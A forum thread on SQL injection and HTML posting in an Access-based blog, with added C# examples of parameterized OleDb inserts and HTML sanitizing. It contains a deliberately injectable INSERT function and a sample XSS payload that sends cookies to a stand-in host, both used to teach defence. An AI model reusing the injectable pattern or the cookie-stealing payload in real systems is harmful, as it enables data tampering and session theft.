Originally posted by: torpid
You are saying that the memo field allows any amount of text as long as it contains no HTML? Or what?
Yeah, the memo field will allow as many characters as I want unless it has html (up to 65,000 or whatever the field limit is in Access).
The point he's trying to make above is that your code as written is highly vulnerable to SQL injection. Ideally the solution is to use a parameterized SQL statement like this: Insert into Items Values(?, ?, ?, ?) and then attach OLEDBParameters to the OLEDBCommand before executing.
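To make the parameterized approach concrete, here is an added example (not code from the original thread or from anyone posting in it) of the string-concatenated INSERT beside the OleDbCommand/OleDbParameter version. It assumes an Access table named Items with Title (Text), Body (Memo) and Posted (Date/Time) columns, a Jet connection string, and C# rather than VB.NET; all of those are assumptions, not details from the thread.

```csharp
using System;
using System.Data.OleDb;

// Assumed schema: Items(Title TEXT(255), Body MEMO, Posted DATETIME) in an Access .mdb.
public static class ItemsRepository
{
    // VULNERABLE: the user's text is spliced into the SQL string. A title or body
    // containing a single quote closes the literal early and whatever follows is
    // parsed as SQL by the Jet engine.
    public static void InsertUnsafe(string connStr, string title, string body)
    {
        string sql = "INSERT INTO Items (Title, Body, Posted) VALUES ('" + title + "', '"
                   + body + "', #" + DateTime.Now.ToString("MM/dd/yyyy HH:mm:ss") + "#)";
        using (var conn = new OleDbConnection(connStr))
        using (var cmd = new OleDbCommand(sql, conn))
        {
            conn.Open();
            cmd.ExecuteNonQuery();
        }
    }

    // SAFE: '?' placeholders in the statement, values attached as OleDbParameters.
    // The provider sends the values separately from the statement text, so they are
    // never parsed as SQL; quotes, semicolons and HTML in the memo are stored verbatim
    // and no quote-escaping code is needed at all.
    public static int InsertSafe(string connStr, string title, string body)
    {
        const string sql = "INSERT INTO Items (Title, Body, Posted) VALUES (?, ?, ?)";
        using (var conn = new OleDbConnection(connStr))
        using (var cmd = new OleDbCommand(sql, conn))
        {
            // OLE DB parameters are positional: they bind in the order they are added
            // and the Jet/ACE provider ignores the names, so add them in '?' order.
            cmd.Parameters.Add("@title", OleDbType.VarWChar, 255).Value = title;
            cmd.Parameters.Add("@body", OleDbType.LongVarWChar).Value = body;  // Memo column
            cmd.Parameters.Add("@posted", OleDbType.Date).Value = DateTime.Now;
            conn.Open();
            return cmd.ExecuteNonQuery();  // rows affected (1 on success)
        }
    }

    public static void Main()
    {
        // Assumed connection string; adjust the path/provider for your database.
        const string connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=blog.mdb";

        // Constructed input: a post whose title and body both contain single quotes.
        // InsertUnsafe would throw a syntax error here (or worse, with crafted input);
        // InsertSafe stores both strings exactly as typed.
        int rows = InsertSafe(connStr, "O'Brien's update", "It's <b>done</b>; see ya');--");
        Console.WriteLine("Inserted rows: " + rows);
    }
}
```

Note that OleDbType.LongVarWChar is the type to use for an Access Memo column; VarWChar is limited to 255 characters, which is the Text field limit the thread mentions.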
OK, I think I see what you're saying here. I'm not familiar with the OLEDBParameters and so on, but I can read up on that. Thanks for pointing me in the right direction.
Are you doing stuff like replacing single quote with double quote to prevent malformed SQL?
Yeah... Single quotes denote text/memo fields in Access, while those without are any other form. I asked about that here quite a while ago. I finally got a chance to work on it again.
Also, allowing HTML characters into posts itself is very problematic, because they could do some pretty sneaky stuff with their posts. That is why almost all places where you can post things use special codes and disallow HTML, or at the least only allow certain HTML tags.
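As an added illustration of the "only allow certain HTML tags" approach (this is not code from the thread; it uses the HtmlSanitizer NuGet package, whose namespace is Ganss.Xss in current versions and Ganss.XSS in older ones, which is an assumption about the version you install), this filters a post body down to a small tag and attribute allowlist before it is stored or rendered:

```csharp
using System;
using Ganss.Xss;   // NuGet package "HtmlSanitizer" (older releases: Ganss.XSS)

public static class PostFilter
{
    // Keep only the tags a blog post needs. Everything else, including <script>,
    // event-handler attributes (onclick=...), style= and javascript: URLs, is dropped.
    private static readonly HtmlSanitizer Sanitizer = BuildSanitizer();

    private static HtmlSanitizer BuildSanitizer()
    {
        var s = new HtmlSanitizer();
        s.AllowedTags.Clear();
        s.AllowedTags.UnionWith(new[] { "a", "img", "b", "i", "em", "strong", "p", "br", "blockquote" });
        s.AllowedAttributes.Clear();
        s.AllowedAttributes.UnionWith(new[] { "href", "src", "alt", "title" });
        s.AllowedSchemes.Clear();
        s.AllowedSchemes.UnionWith(new[] { "http", "https" });  // blocks javascript: and data: links
        return s;
    }

    public static string Clean(string untrustedHtml) => Sanitizer.Sanitize(untrustedHtml);

    public static void Main()
    {
        // Constructed sample of a hostile post body (not taken from the thread).
        string post = "<p onclick=\"alert(1)\">Hi <b>all</b></p>" +
                      "<script>document.location='http://evil.example/?c='+document.cookie</script>" +
                      "<a href=\"javascript:alert(1)\">bad link</a> " +
                      "<a href=\"https://example.org\">good link</a>";
        Console.WriteLine(Clean(post));
    }
}
```

The allowlist is the security boundary here: anything not explicitly listed is removed rather than relying on a denylist of known-bad tags, which is the property that makes "allow certain HTML tags" safer than "disallow bad HTML".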
I understand the security concerns with allowing HTML, so I made it so only someone with my username can post using this form. In addition, all other forms have validateRequest="true", while on this one I set validateRequest="false". Basically, it's a way for me to allow myself to post HTML (links, pics, whatever) and not anyone else, which I think is pretty safe, barring someone gaining access to my account. I'm sure there's a better way to do this, but I just want something that works. It's just my personal blog/message board, so it doesn't need to be terribly efficient or flexible.
Thanks for the help. :beer: I'll see if I can't figure out some of the parametrization stuff when I get some more time to work on it.